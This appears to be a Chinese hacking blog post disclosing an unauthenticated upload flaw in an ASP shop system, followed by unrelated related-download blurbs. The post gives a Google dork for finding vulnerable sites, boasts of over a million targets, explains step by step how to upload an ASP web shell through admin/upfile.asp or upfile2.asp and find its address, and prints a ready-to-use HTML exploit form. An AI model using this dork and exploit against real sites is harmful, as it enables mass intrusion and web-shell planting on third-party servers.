前些天出了个Cookies注入漏洞,今天又翻了看了下~
在ADMIN目录有2个上传文件upfile.asp和upfile2.asp
这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。
另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。
1,谷歌里写上inurl:List.asp?Shop_ID
2,如果网站存在以上上传文件,90%能上传asp文件。
3,将图片123中地址替换成自己检测的网站地址即可 。
4,在选择图片文件里直接上传asp文件。 (其实能上传任意后缀的文件。)
5,打开网站首页,寻找图片真实地址。一般shell地址为http://www.XXX.com/pic/XXXXXX.asp
罗嗦一句,上传组件不是有2个吗? 一般管理员会修改或者删第一个upfile.asp,第二个也是可以利用的upfile2.asp
如果测试失败。说明此漏洞已经打上补丁。如果没有打补丁测试失败,引用一段话:在一般情况下,某事物个体发生具有自身特有属性的负面现象,而这种现象无法从科学的角度得到合理的解释,但它又确实存在,我们一般称之为人品问题.(RPWT)” -----------摘自《辞海》第874页
EXP:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF">
<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
<form name="myform" method="post" action="http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript" onsubmit="return check();">
<tr align="center" valign="middle">
<td height="15" align="left"> 选择图片:
<input type="file" name="file1" value=""> <input type="submit" value="上传" name="B1" class="txt " isshowprocessbar="True"></td>
</tr>
</form>
</table>
</body>
</html>
分享到:
相关推荐
【压缩包子文件的文件名称列表】:"TL-WDR6500 V6.0升级软件20171013"是压缩包内的唯一文件,这通常是一个包含升级程序的文件,用户在下载后需要按照指导进行操作,将此文件上传到路由器,以完成固件的更新过程。...
大学校园网络店铺V6.0简介 1.全站设计考虑校园电子商务模式,人性化的设计,独特的校园式网络店铺平台。 2.功能十分强大的后台管理界面,通过IE浏览器即可管理整个网站,让你不懂技术也可以管理。 3.主要针对校园,...
3.利用aspupload上传组件获取会员上传的图片,有效提高执行效率,节约服务器资源。采用aspjpeg组件自动生成缩略图,大大加快网页的访问速度。 4.严密的系统安全防范机制,杜绝一切注入和上传漏洞攻击。 5.全方位的...
为了安全,要对对每个目录按不同的用户设置不同的访问权限,然后关闭一些不需要的服务,这样可以对不良人士利用IIS溢出漏洞访问到系统盘作个第一级防护。 3.iis安全设置之端口设置。IIS有默认的端口设置,只要稍有...
总的来说,柏顿ASP文章管理系统v2.0是一款适用于中小型企业或个人网站的内容管理解决方案,利用ASP技术实现了便捷的后台管理和高效的前台展示。对于熟悉ASP的开发者,这个系统提供了快速搭建和管理网站文章的可能性...
上传目录的设置需要管理员进行仔细配置,包括对上传文件类型的限制和大小的限制,防止恶意文件上传到服务器。 日志设置对于安全审计非常重要,应当确保所有相关的安全事件都被记录,并且日志文件本身也应保持安全,...
1.上传所有程序到服务器,建议将RAICO安装到网站根目录,否则可能会出现问题! 2.然后在IE打开 http://www.youdomain.com/install.php 按照向导进行安装 3.RAICO的后台管理地址:...
在启用网络防火墙的情况下,您的网站仍然被黑客植入了木马,这很明显,您网站的程序存在漏洞,黑客通过SQL注入或跨站攻击及非法上传等方式将脚本木马上传并控制了您的服务器,那么从现在起就立即安装威盾防火墙,将...